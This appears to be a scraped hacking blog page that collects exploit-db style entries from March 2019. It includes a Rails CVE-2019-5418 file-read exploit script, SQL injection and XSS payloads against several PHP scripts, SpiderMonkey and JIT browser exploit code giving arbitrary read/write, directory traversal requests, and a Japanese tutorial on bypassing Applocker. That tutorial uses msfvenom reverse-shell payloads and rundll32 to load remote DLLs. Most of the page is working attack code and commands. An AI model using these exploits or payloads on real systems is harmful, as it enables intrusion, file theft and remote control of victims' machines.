'''
Exploit Title: File Content Disclosure on Rails
Date: CVE disclosed 3/16 today's date is 3/20
Exploit Author: NotoriousRebel
Vendor Homepage: https://rubyonrails.org/
Software Link: https://github.com/rails/rails
Version: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)
CVE: 2019-5418
'''
import sys
try:
import requests
except ImportError:
print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m')
sys.exit(1)
def banner():
banner = """
----------------------------------------------
Arbitrary Traversal exploit for Ruby on Rails
CVE-2019-5418
----------------------------------------------
"""
print(banner)
def check_args():
if len(sys.argv) != 2:
print("Invalid number of arguments entered!")
how_to_use = "python3 Bandit.py url"
print('Use as:', how_to_use)
sys.exit(1)
def check_url(url):
status_code = requests.get(url)
if status_code != 200:
print("Url is invalid or can not be reached!")
sys.exit(1)
def read_file(url, file):
headers = {'Accept': file + '{{'}
req = requests.get(url, headers=headers)
return req
def main():
banner()
check_args()
url = sys.argv[1]
while True:
try:
file = input("Enter file to read (enter quit to exit): ")
except Exception:
file = raw_input("Enter file to read (enter quit to exit): ")
try:
if file.lower() == 'quit':
break
except Exception:
if file == 'quit':
break
response = read_file(url, file)
print(response.text)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m')
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863591795
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: XooGallery - Multiple SQL Injections
# Date: 26.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://xooscripts.com/product/html5-php-photo-gallery.html
# Demo Site: http://xooscripts.com/demos/xoogallery/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/gal.php?gal_id=1
Vulnerable Parameter: gal_id (GET)
Payload: gal_id=29' AND 2692=2692 AND 'WCFf'='WCFf
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/photo.php?photo_id=1
Vulnerable Parameter: photo_id (GET)
Payload: photo_id=1' AND 5479=5479#
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/cat.php?cat_id=1
Vulnerable Parameter: cat_id (GET)
Payload: cat_id=1' AND 9338=9338 AND 'SZIH'='SZIH
----- PoC 4: SQLi -----
Request: http://localhost/[PATH]/results.php?p=1
Vulnerable Parameter: p (GET)
Payload: p=-8412' OR 2597=2597#
# Exploit Title: XooDigital - 'p' SQL Injection
# Date: 26.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://xooscripts.com/product/digital-download-protection-script.html
# Demo Site: http://xooscripts.com/demos/xoodigital/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC : SQLi -----
Request: http://localhost/[PATH]/results.php?p=1
Vulnerable Parameter: p (GET)
Payload: p=1') OR NOT 7970=7970#
# Exploit Title: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2019-03-24
# Google Dork: N/A
# Vendor: Rukovoditel
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Affected Version: 2.4.1 and possibly before
# Patched Version: patched in extension version 2.4.1
# Category: Web Application
# Platform: Windows
# Tested on: Win10x64 & Kali Linux
# CVE: 2019-7400
# References:
# https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
# 1. Technical Description:
# path parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks
# through a GET request in index.php resource.
# 2. Proof Of Concept (PoC):
# http://localhost/index.php?module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E
# 3. Payload
# "><img src=a onerror=alert("VULNERABLE")>
<script>
let size = 64;
garr = [];
j = 0;
function gc(){
var tmp = [];
for(let i = 0;i < 0x20000;i++){
tmp[i] = new Uint32Array(size * 2);
for(let j = 0;j < (size*2);j+=2){
tmp[i][j] = 0x12345678;
tmp[i][j+1] = 0xfffe0123;
}
}
garr[j++] = tmp;
}
let arr = [{},2.2];
let obj = {};
obj[Symbol.species] = function(){
victim.length = 0x0;
for(let i = 0;i < 0x2000;i++){
gvictim[i].length = 0x0;
gvictim[i] = null;
}
gc();
//Array.isArray(garr[0][0x10000]);
return [1.1];
}
let gvictim = [];
for(let i = 0;i < 0x1000;i++){
gvictim[i] = [1.1,2.2];
gvictim[i].length = size;
gvictim[i].fill(3.3);
}
let victim = [1.1,2.2];
victim.length = size;
victim.fill(3.3);
for(let i = 0x1000;i < 0x2000;i++){
gvictim[i] = [1.1,2.2];
gvictim[i].length = size;
gvictim[i].fill(3.3);
}
function fake(arg){
}
for(let i = 0;i < size;i++){
fake["x"+i.toString()] = 2.2;
}
function jit(){
victim[1] = 1.1;
arr.slice();
//fake.x2 = 6.17651672645e-312;
return victim[2];
}
flag = 0;
for(let i = 0;i < 0x10000;i++){
xx = jit();
}
arr.constructor = obj;
Array.isArray(victim);
alert(333);
alert(jit());
</script>
# Exploit Title: Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/c-23-ilan-Siteleri.html
# Demo Site: http://ilanv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A
----- PoC : SQLi -----
Request: http://localhost/[PATH]/m/katgetir.php?kat=1
Vulnerable Parameter: kat (GET)
Payload: kat=1' OR NOT 1300=1300-- rwTf
0x00はじめに
この記事では、ホワイトリストのApplockerバイパスの最も一般的で馴染みのあるテクニックを示しています。セキュリティ上の理由から、システム管理者はグループポリシーを追加して、ローカルユーザーのアプリケーション実行を制限しています。前の投稿では、「Windows Applockerポリシー - 初心者向けガイド」について説明しました。なぜなら、アプリケーション制御ポリシーとそれらの使用方法に関するApplockerルールを定義しているからです。ただし、今日は、rundllファイルを使用してApplockerポリシーをバイパスする方法を学びます。
DLLファイルは、ウィンドウのオペレーティングシステムにとって非常に重要であり、ウィンドウをカスタマイズするための他のプログラムの実行も決定します。動的リンクライブラリ(DLL)ファイルは、何かを呼び出す方法に関する他のプログラムに指示を提供するファイルタイプです。したがって、複数のソフトウェアは、このようなDLLファイルを同時に共有することもできます。フォーマットは.exeファイルと同じですが、DLLファイルは.exeファイルのように直接実行することはできません。 dllファイル拡張子は:dll(動的リンクライブラリ)、ocx(activexコントロール)、cpl(コントロールパネル)、drv(デバイスドライバー)にすることができます
0x01 run
Applockerを使用すると、DLLファイルは複数の部品に分割されます。これにより、実行中のDLLファイルがシンプルかつ高速になります。各部品は、実行時にメインプログラムにインストールされます。各セクションは異なって独立しているため、読み込み時間はより速く、ファイルの機能が必要な場合にのみ行われます。また、この機能により、他の部品に影響を与えずにアップグレードが簡単に適用できます。たとえば、毎月新しい単語を追加する辞書プログラムがあるため、このプログラムでは、更新する必要があります。そのための完全な他のプログラムをインストールすることなく。
1。利点
使用するリソースを使用します
モジュラーアーキテクチャを促進します
展開とインストールを簡素化します
2。短所
依存関係DLLは新しいバージョンにアップグレードされます
dllに依存して固定されています
依存関係DLLは、以前のバージョンによって上書きされます
コンピューターから依存関係DLLを削除します
0x02 DLLファイルを使用してApplockerバイパスを使用するさまざまな方法
SMB_Delivery
msfvenom
Koadic
cmd.dll経由でコマンドプロンプトを取得します
jsrat
したがって、
1。最初の方法:SMB配信
したがって、私たちのアプローチはSMB_Deliveryを使用することです。この方法を使用するには、Kaliの端末を開き、次のコマンドを入力します。MSFConsoleUseExploit/Windows/SMB/SMB_DELIVERY
MSF Exploit(Windows/SMB/SMB_Delivery)SET SRVHOST 192.168.1.107
MSFエクスプロイト(Windows/SMB/SMB_Delivery)Exploit
Windowsコンピューターでrundll32.exeを介して悪意のあるコードを実行して、meterpreterセッションを取得します
上記のペイロードが実行されると、被害者のPCで実行されるコマンドが得られます。セッションを取得するために。したがって、次の図に示すように、被害者PCの実行ウィンドウに指定されたコマンドをコピーして貼り付けます。
rundll32.exe \\ 192.168.1.107 \ ztmw \ test.dll、0 
コマンドが実行されると、MeterPreterセッションが行われます。セッションタイプにアクセスするには、次のようになります。
セッション1
sysinfo
2。 2番目の方法:msfvenom
2番目の方法はMSFvenomを使用しています。この方法を使用するには、Kaliの端末に次のコマンドを入力します。
MSFVENOM -P Windows/MeterPreter/Reverse_tcp lhost=192.168.1.107 lport=1234 -f dll 1.dll
ペイロードを作成した後、被害者PCの実行ウィンドウで次のコマンドを実行します。
rundll32shell32.dll、control_rundllc: \ users \ raj \ downloads \ 1.dll 
同時に、次のコマンドを入力してセッションを取得してマルチ/ハンドラーを開始します。コマンドを入力します。MSFCONSOLEMSFEXPLOIT(MULTI/HANDLER)SET PAYLOAD WINDOWS/METERPRETER/REVERSE_TCP
MSF Exploit(Multi/Handler)セットLHOST 192.168.1.107
MSF Exploit(Multi/Handler)Set LPort 1234
MSF Exploit(Multi/Handler)Exploit
3。 3番目の方法:koadic
次のアプローチは、Koadicフレームワークを使用することです。 Koadicは、MeterPreterやPowerShellempireなどの他の浸透試験ツールに似た後期開発のルートキットです。 Koadicの詳細については、以下のリンクを介して上記のフレームワークに関する詳細な記事をご覧ください:https://www.hackingarticles.in/koadic-command-control-framework
Koadicが稼働したら、次のコマンドを入力してください。
Stager/JS/rundll32_jsを使用します
SRVHOST 192.168.1.107を設定します
走る
エクスプロイトを実行するとコマンドが得られます。 rundll32.exeから6.0にコマンドをコピーし、被害者PCのコマンドプロンプトに貼り付けます。
CMDでコマンドを実行したら、独自のセッションがあります。下の図に示すように。
セッションにアクセスするには、次のコマンドを入力します。
ゾンビ0
4。 4番目の方法:cmd.dllを介してコマンドプロンプトを取得
今の問題は、被害者のホストでコマンドプロンプトがブロックされている場合はどうすればよいですか?
コマンドラインがブロックされている場合、ディディエスティーブンスが開発したスクリプトを使用して、小さな問題を解決できます。次のリンクで見つけることができます。
http://didierstevens.com/files/software/cmd-dll_v0_0_4.zip
上記のURLでは、zipファイルをダウンロードします。 zipファイルを解凍し、次のコマンドを使用して実行ウィンドウでファイルを実行します。
rundll32 shell32.dll、control_rundll c: \ users \ raj \ downloads \ cmd.dll
コマンドを実行すると、ブロックされていないCMDが取得されます。以下に示すように:
5。 5番目の方法:jsrat
regsvr32を攻撃する次の方法は、jsratを使用することです。Githubからダウンロードできます。これは、KoadicとPowershell Empireと同様の別のコマンドおよび制御フレームワークであり、rundll32.exeとregsvr32.exeのみの悪意のあるプログラムを生成します。 JSRATは、JSファイルを見つけるWebサーバーを作成します。この方法を使用するには、次の方法を入力します。
/jsrat.py -i 192.168.1.107 -p 4444
JSRATが実行を開始すると、ブラウザで開くリンクが提供されます。ページには、被害者のホストで実行されるコードが含まれます
したがって、ブラウザでhttp://192.168.1.107/WTFリンクを開いてください。以下に、次の図に示すように、悪意のあるコードが表示されます。
次のように、被害者PCのコマンドプロンプトでコードを実行します。
次の図に示すようにセッションがあります。
0x03要約
DLLファイルは、さまざまなコードと手順のコレクションです。これらのファイルは、Windowsプログラムが正確に実行されるのに役立ちます。これらのファイルは、複数のプログラムが同時に使用するために作成されます。この手法は、メモリの使用量を減らすのに役立ちます。したがって、これらのファイルは非常に重要であり、ユーザーに問題を引き起こすことなくWindowsが適切に機能する必要があります。したがって、これらのファイルを利用することは非常に効果的で致命的です。上記で紹介した方法は、さまざまな方法の使用です。
/*
A bug in IonMonkeys type inference system when JIT compiling and entering a constructor function via on-stack replacement (OSR) allows the compilation of JITed functions that cause type confusions between arbitrary objects.
# Prerequisites:
1. Spidermonkey can represent "plain" objects either as NativeObject (https://github.com/mozilla/gecko-dev/blob/dbddac86aadf1d4871fb350bbe66db43728a9f81/js/src/vm/NativeObject.h#L431) or as UnboxedObjects (https://github.com/mozilla/gecko-dev/blob/dbddac86aadf1d4871fb350bbe66db43728a9f81/js/src/vm/UnboxedObject.h#L168). NativeObjects are basically two pointers to type information objects (the "Group" and "Shape") as well as inline and out-of-line properties (both stored in NaN-boxed form) and elements. UnboxedObject, on the other hand, can store their properties in unboxed form, e.g. as native 32-bit integer or even 8-bit booleans. An UnboxedObject can always be converted to a NativeObject (by boxing the properties and potentially allocating out-of-line storage). This e.g. happens if, during a property assignment, the type of the new value mismatches the current type of the property. The function implementing the conversion can be found here: https://github.com/mozilla/gecko-dev/blob/dbddac86aadf1d4871fb350bbe66db43728a9f81/js/src/vm/NativeObject.h#L431
2. Spidermonkey can track the possible types of object properties for the purpose of type inference: https://github.com/mozilla/gecko-dev/blob/dbddac86aadf1d4871fb350bbe66db43728a9f81/js/src/vm/ObjectGroup.h#L111. For example, after executing the following code (and assuming no other code ran that assigned a different value to a property .x), Spidermonkey will know that the property .x will always be a Uint8Array and uses that information to omit type checks in JIT compiled code.
var o = {};
o.x = new Uint8Array(0x1000);
Assigning a value of a different type to such a property will invalidate (or widen) the inferred type and potentially invalidate any JITed code that relies on that.
3. A constructor in Spidermonkey can have a "template" type (Group and potentially Shape) associated with it which represents the type of the constructed objects *after* initialization has finished. The caller of such a constructor is responsible for allocating the newly constructed object of the final type (via js::CreateThisForFunction) and passing it as argument to the constructor. As such, JITed code for a constructor can rely on receiving an object of the template type and can use that to emit code for property stores to existing properties instead of code for property definitions (which in addition to writing the property value also have to update the Shape of the object).
As an example, consider the following constructor function:
function Ctor() {
this.a = 42;
this.b = 43;
}
After several invocations, the type inference system will compute the final type of the constructed objects. In that case it could be UnboxedObject with two integer properties, .a and .b. At a later point IonMonkey would start JIT compiling the constructor. By relying on the fact that the caller will always pass in an object with the template type, IonMonkey can now emit code that simply stores the two values into the existing property slots. This optimization is only possible if Spidermonkey can prove that the constructed object doesn't escape the local scope before the final property definition (and so the existence of the properties before they are actually defined in the code isn't visible to the running script). The result type for constructors is computed here: https://github.com/mozilla/gecko-dev/blob/dbddac86aadf1d4871fb350bbe66db43728a9f81/js/src/vm/TypeInference-inl.h#L241
# Bug Description
The following program, when run in Spidermonkey built from current release, results in observable misbehaviour: it doesn't show the property .x even though it should exist. Slight mutations of it can also result in nullderef crashes when assigning the property .x, which is how the original sample was found during fuzzing.
function Hax(val, l) {
this.a = val;
for (let i = 0; i < l; i++) {}
this.x = 42;
}
for (let i = 0; i < 1000; i++) {
new Hax(1337, 1);
}
let obj = new Hax("asdf", 100000);
console.log(Object.getOwnPropertyNames(obj));
// prints only "a"
It appears that the following is happening here:
1. During repeated invocations in the outer loop, Spidermonkey's type inference system computes the resulting type for the constructed objects: an UnboxedObject with properties .a and .x of type integer. The constructor is then JIT compiled by IonMonkey, which makes use of the type inference to emit code for property stores to existing properties instead of property definitions.
2. During the final invocation, the JIT code attempts to set the property .a. However, the value now has the wrong type (string instead of integer) for the object. This triggers the following:
- The current |this| object is converted to a NativeObject, which has the properties .a and .x
- The result type for Hax is updated to now be a NativeObject with the two properties .a and .x (as the type inference for the constructor can still prove that both .a and .x will always be installed)
- The |this| object is then "rolled back" to the type it should currently have at this position in the bytecode: https://github.com/mozilla/gecko-dev/blob/dbddac86aadf1d4871fb350bbe66db43728a9f81/js/src/vm/TypeInference.cpp#L4234. Afterwards, the Shape of |this| only indicates the existence of property .a (which is correct at the current position in the code). Presumably, this is done to avoid a situation in which script code can suddenly observe that the constructed object already has the final set of properties before they are defined in the code, which could e.g. happen if the initial analysis relied on the assumption that some function or method called in the constructor was always a specific, known function and inlined it.
- Due to the type inference change, the JIT code is deoptimized and execution continues in the baseline JIT.
3. In the following loop, IonMonkey again starts compiling Hax, and enters into the JITed code via on-stack replacement (OSR) in the middle of the function at the head of the loop. During compilation, IonMonkey again relies on the "template" type for Hax and concludes that |this| must be a NativeObject with properties .a and .x. This is incorrect in this situation, as the rollback has removed the property .x.
4. After the loop finishes, the JITed code only performs the property stores as it believes that the object already has the final Shape. As such, the property store to .x is "forgotten" and Object.getOwnPropertyNames only shows the existence of property .a
# Exploitation
The JITed code after OSR expects |this| to already have the final type and thus only stores the property without updating the Shape. As a result, .x will not be visible and the next property defined on the constructed object afterwards will be assigned the same slot that .x was written into in the JITed code. With that, the following exploit becomes possible, which abuses the type inference mechanism for properties:
In the JITed code, after the loop:
1. Define a property .x on |this| as above. The compiler will infer the type of .x to be type X. This property will then be "forgotten" in the final call due to the bug.
2. Define a new property (of type Y) on the object. It will be stored into the same slot as .x (because that slot is free according the the object's Shape). This has to be a "slow path" property definition that doesn't rely on type inference and instead inspects the Shape of the object and determines the next free slot based on that.
3. Load property .x again. The compiler will infer the type of the loaded value to be X. However, it will actually load an object of type Y
As a result, it is now possible to compile JIT code that confuses an object of type X with an object of type Y where both X and Y can be arbitrarily chosen.
The following JavaScript program (tested against a local Spidermonkey build and Firefox 65.0.1) demonstrates this idea. It first triggers the type confusion between a Float64Array and a custom UnboxedObject, then gains arbitrary read/write from that, and finally crashes when writing to 0x414141414141:
let ab = new ArrayBuffer(0x1000);
let victim = new Uint8Array(0x1000);
function Hax(val, l, trigger) {
// In the final invocation:
// Ultimately confuse these two objects which each other.
// x will (eventually) be an UnboxedObject, looking a bit like an ArrayBufferView object... :)
let x = {slots: 13.37, elements: 13.38, buffer: ab, length: 13.39, byteOffset: 13.40, data: []};
// y is a real ArrayBufferView object.
let y = new Float64Array(0x1000);
// * Trigger a conversion of |this| to a NativeObject.
// * Update Hax's template type to NativeObject with .a and .x (and potentially .y)
// * Trigger the "roll back" of |this| to a NativeObject with only property .a
// * Bailout of the JITed code due to type inference changes
this.a = val;
// Trigger JIT compilation and OSR entry here. During compilation, IonMonkey will
// incorrectly assume that |this| already has the final type (so already has property .x)
for (let i = 0; i < l; i++) {}
// The JITed code will now only have a property store here and won't update the Shape.
this.x = x;
if (trigger) {
// This property definition is conditional (and rarely used) so that an inline cache
// will be emitted for it, which will inspect the Shape of |this|. As such, .y will
// be put into the same slot as .x, as the Shape of |this| only shows property .a.
this.y = y;
// At this point, .x and .y overlap, and the JITed code below believes that the slot
// for .x still stores the UnboxedObject while in reality it now stores a Float64Array.
}
// This assignment will then corrupt the data pointer of the Float64Array to point to |victim|.
this.x.data = victim;
}
for (let i = 0; i < 1000; i++) {
new Hax(1337, 1, false);
}
let obj = new Hax("asdf", 10000000, true);
// Driver is now a Float64Array whose data pointer points to a Uint8Array.
let driver = obj.y;
// Write to address 0x414141414141 as PoC
driver[7] = 3.54484805889626e-310;
victim[0] = 42;
For completeness, here is a minimal crashing sample:
*/
function Hax(val, l) {
this.a = val;
for (let i = 0; i < l; i++) {}
this.x = 42;
this.y = 42;
// After conversion to a NativeObject, this property
// won't fit into inline storage, but out-of-line storage
// has not been allocated, resulting in a crash @ 0x0.
this.z = 42;
}
for (let i = 0; i < 10000; i++) {
new Hax(13.37, 1);
}
let obj = new Hax("asdf", 1000000);
/*
As well as the original sample that the fuzzer triggered:
// Run with --no-threads --ion-warmup-threshold=100
function v5(v6, v8) {
if (v8) {
// Triggers the rollback etc. in a recursive call.
const v11 = new v5(v6);
const v13 = new Float32Array(40183);
for (const v14 of v13) {
}
}
// This property assignment crashes as out-of-line
// property storage has not been allocated yet.
this[-3083318214] = v6;
}
for (let v19 = 0; v19 < 1337; v19++) {
const v21 = new v5(32768, false);
}
const v22 = new v5(v5, true);
Fixed in https://www.mozilla.org/en-US/security/advisories/mfsa2019-08/#CVE-2019-9791
The issue was fixed in two ways:
1. In https://github.com/mozilla/gecko-dev/commit/67fc2c30797036217de91cdb4b6d77a876bed7db the conversion from UnboxedObjects to NativeObjects was changed to no longer copy the definite properties of the ObjectGroup. As a result, in step 2 above, the new NativeGroup now wouldn't have the definite properties .a and .x anymore, preventing the recompiled JIT code from relying on them.
2. UnboxedObjects were disabled by default in https://github.com/mozilla/gecko-dev/commit/a4d10aaa50842ef6b15ef8982ab0c4b478ef9109 and are now (apparently) being completely removed from the engine: https://bugzilla.mozilla.org/show_bug.cgi?id=1505574
*/
# Exploit Title: Jettweb Hazır Rent A Car Scripti V4 - SQL Injection
# Date: 26.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-46-php-hazir-rent-a-car-scripti-v4.html
# Demo Site: http://rentv4.proemlaksitesi.net/
# Version: V4
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request:
http://localhost/[PATH]/admin/index.php?admin=vitestipi&tur=VitesTipi
Vulnerable Parameter: tur (GET)
Payload: admin=vitestipi&tur=VitesTipi' AND 2211=2211 AND 'fVeE'='fVeE
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/admin/index.php?admin=rez-gor&id=2
Vulnerable Parameter: id (GET)
Payload: admin=rez-gor&id=2 AND SLEEP(5)
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/admin/index.php
Vulnerable Parameter: ozellikdil (GET)
Payload:
admin=ozellikekle&itemid=1&ozellikdil=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&syf=ceviriguncelle&tur=VitesTipi
'''
# Exploit Title: Thomson Reuters Concourse & Firm Central < 2.13.0097 - Directory Traversal & Local File Inclusion
# Date: 02/13/2019
# Exploit Author: 0v3rride
# Vendor Homepage: https://www.thomsonreuters.com/en.html
# Software Link: Firm Central (http://info.legalsolutions.thomsonreuters.com/software/firm-central/default.aspx) & Concourse (http://info.legalsolutions.thomsonreuters.com/software/concourse-matter-room/)
# Version: (< 2.13.0097 - Thomson Reuters Concourse & Firm Central) (ThomsonReuters.Desktop.Service.exe v1.9.0.358)
# Affected Component: ThomsonReuters.Desktop.Service.exe and/or ThomsonReuters.Desktop.exe v1.9.0.358
# Tested on: Windows
# CVE: 2019-8385
Summary:
The ThomsonReuters.Desktop.Service.exe or ThomsonReuters.Desktop.exe does not properly handle a modified get request. All version prior to 2.13.0097 of Thomson Reuters Concourse and Firm Central utilize this component, thus they are affected after working with and speaking with the information security team at Thomson Reuters. By default the service listens on 6677, but is sometimes may be listening on ports 7000, 7001 or 7002.
Exploitation:
Currently, this vulnerability is only exploitable by modifying the
request in the repeater module of Port Swigger's Burp suite tool. The
affected component usually on port 6677 by default.
E.g. GET request in burp suite
GET \..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts HTTP/1.1
Host: host.domain.tld:6677
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: _ga=GA1.2.1239644041.1549987630; _gid=GA1.2.1694605918.1549987630
Upgrade-Insecure-Requests: 1
Additionally, the file path cannot end with
a backslash (\). You will be presented with following error if so -
<h1>Page Not Found</h1>Sorry, we couldn't find what you were looking
for . A sequence of at least five slash-dot-dots (\..) are needed. Furthermore, if you use the intruder module in Burp to automate the process, make sure that the payloads are not being encoded into any format (url encode, b64 encode, etc.) as this will mangle the request and you won't get a response.
The python script checks for the error message by sending a request and looking for the error specified in the response. You can easily do this yourself by simply navigating to the FQDN or IP of the host on port 6677 or other port to see if you get the error in your web browser.
Solution:
Download the latest version
Stop the Thomson Reuters Desktop Extensions service and set the startup type value to disabled using powershell, services.msc, etc.
'''
#!/usr/bin/env python
#######################
# PoC by: 0v3rride #
# DoC: March 2019 #
#######################
from argparse import *;
from requests import *;
def parseArgs():
parser = ArgumentParser();
parser.add_argument("-host", required=True, type=str, help="IP address or FQDN of the host to check");
parser.add_argument("-verbose", required=False, action="store_true", default=False, help="Returns a detailed response from the get request");
parser.add_argument("-tls", required=False, action="store_true", default=False, help="Use this flag is the target host is using https");
parser.add_argument("-port", required=False, type=int, default=6677, help="By default the Thomson Reuters Desktop Service listens on port 6677, but I've also seen it listen on ports 7000-7002");
return parser.parse_args();
def check(cargs):
args = cargs
greq = None;
try:
if args.tls:
greq = get("{}{}:{}".format("https://", args.host, args.port));
elif not args.tls:
greq = get("{}{}:{}".format("http://", args.host, args.port));
else:
greq = get("{}{}:{}".format("http://", args.host, args.port));
if args.verbose:
print("{}:{}".format("Detailed Response", "-"*58));
for hdr in greq.headers.keys():
print("{}: {}".format(hdr, greq.headers[hdr]));
print("\n{}:{}".format("Vulnerability Information", "-"*50));
if greq.text.find("<h1>Page Not Found</h1>Sorry, we couldn't find what you were looking for ") > -1:
print("[!!!]: The target appears to be VULNERABLE to directory traversal!\n");
print("[i]: Use the following GET request value with the repeater tool in Burp Suite to confirm: \\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\Drivers\\etc\\hosts\n");
print("[i]: Make sure the paths you are traversing to don't end with a backslash '\\', otherwise it will not work. You'll know when this happens via an error message in the response.\n");
print("[i]: If you decide to run the request with the intruder tool in Brup Suite, then make sure Brup doesn't encode the payloads as this will not make it work either.\n");
else:
print("[i]: The target DOES NOT appear to be vulnerable to directory traversal. However, there is a chance that the error message was disabled, etc.\n")
print("[i]: You may to try the following GET request value with the repeater tool in Burp Suite to confirm: \\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\Drivers\\etc\\hosts\n");
print("[i]: Make sure the paths you are traversing to don't end with a backslash '\\'.\n");
print("[i]: If you decide to run the request with the intruder tool in Brup Suite, then make sure Brup doesn't encode the payloads as this will not make it work either.\n");
except:
print("[i]: A connection to the target could not be made!\n");
print("[i]: The target may not be vulnerable to directory traversal. Check your information regarding the target and arguments then try again.\n");
def main():
print(r"""
______ _______ ____ ___ _ ___ ___ _____ ___ ____
/ ___\ \ / / ____| |___ \ / _ \/ |/ _ \ ( _ )___ / ( _ ) ___|
| | \ \ / /| _| _____ __) | | | | | (_) |_____ / _ \ |_ \ / _ \___ \
| |___ \ / | |__|_____/ __/| |_| | |\__, |_____| (_) |__) | (_) |__) |
\____| \_/ |_____| |_____|\___/|_| /_/ \___/____/ \___/____/
[*] https://github.com/0v3rride
[*] Script has started...
[*] Use CTRL+C to cancel the script at anytime.
[!]: This script checks to see if the target appears vulnerable, but does not guarantee it! It does not exploit the vulnerability either!
[!]: You might need to use the dos2unix tool for conversion and functionality purposes on a Linux box!
""");
check(parseArgs());
#print(get("http://10.12.8.2:6677").text);
print("[!]: Done!");
#Begin
main();
# Exploit Title: Simple Job Script - Multiple Vulnerabilities
# Date: 26.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://simplejobscript.com/
# Download Link:
https://github.com/niteosoft/simplejobscript/archive/master.zip
# Demo Site: https://demo.simplejobscript.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/searched
Vulnerable Parameter: landing_location (POST)
Payload:
landing_location=-1%20OR%203*2*1=6%20AND%20000405=000405%20--%20&landing_title=test
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/get_job_applications_ajax.php
Vulnerable Parameter: job_id (POST)
Payload: job_id=-1%20OR%203*2*1=6%20AND%20000615=000615%20--%20
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/register-recruiters
Vulnerable Parameter: employerid (POST)
Payload: if(now()=sysdate(),sleep(0),0)
----- PoC 4: SQLi -----
Request: http://localhost/[PATH]/delete_application_ajax.php
Vulnerable Parameter: app_id (POST)
Payload:
app_id=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/
----- PoC 5: XSS -----
Request:
http://localhost/[PATH]/jobs?_=1&job_type_value[]=Full%20time&srch_location_val[]=fulltime_ctype
Vulnerable Parameter: job_type_value[] (GET)
Payload: "><svg+onload%3Dalert(document.cookie)>
# Exploit Title: Titan FTP Server Version 2019 Build 3505 Directory Traversal/Local File Inclusion
# Google Dork: N/A
# Date: 3/26/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://titanftp.com/
# Software Link: https://titanftp.com/download
# Version: Firmware: Titan FTP Server Version 2019 Build 3505
# Tested on: Windows 7 32 Bit
# CVE : CVE-2019-10009
**********************************************************************
Discovered By: Kevin Randall on 3/23/2019
**********************************************************************
A Directory Traversal issue was discovered in the Web GUI in Titan FTP Server 2019 Build 3505.
When an authenticated user attempts to preview an uploaded file (through PreviewHandler.ashx) by using a \..\..\ technique, arbitrary files can
be loaded in the server response outside the root directory.
***********************************************************************
Tools used:
Parrot OS
Windows 7 32 Bit
BurpSuite
Browser
*************************************************************************
Vulnerability has been fixed in the following build:
Build: Titan FTP Server 2019 Build 3515
**************************************************************************
Proof of Concept (PoC):
Step 1: Authenticate through Titan FTP Web GUI
Step 2: Upload file and attempt to view it
Step 3: Intercept requests with BurpSuite when attempting to view uploaded file
Step 4: Modify "path=" and "filename=" parameters in the following GET request:
Ex: View contents of README.txt file in Python27 directory:
Note: You can access other files in directories such as System32, Desktop etc.
Payload:
*****************************************************************************************
GET /PreviewHandler.ashx?path=\..\..\..\..\Python27\README.txt&filename=README.txt
*****************************************************************************************
Step 5: If path is set-up correctly and if file exists, you will receive a 200 OK back from the server.
Step 6: View the file through the file preview in the FTP server.
**************************************************************************************************
**************************************************************************************************
Timeline:
Date Discovered: 3/23/2019
Date Disclosed to Vendor: 3/23/2019
CVE Obtained: 3/24/2019
Vendor Created Patched Version Titan FTP Version 2019 Build 3515: 3/25/2019
Vendor Created Entry in Jira System for issue (SVR-499): 3/25/2019
Date Disclosed: 3/26/2019
**************************************************************************************************
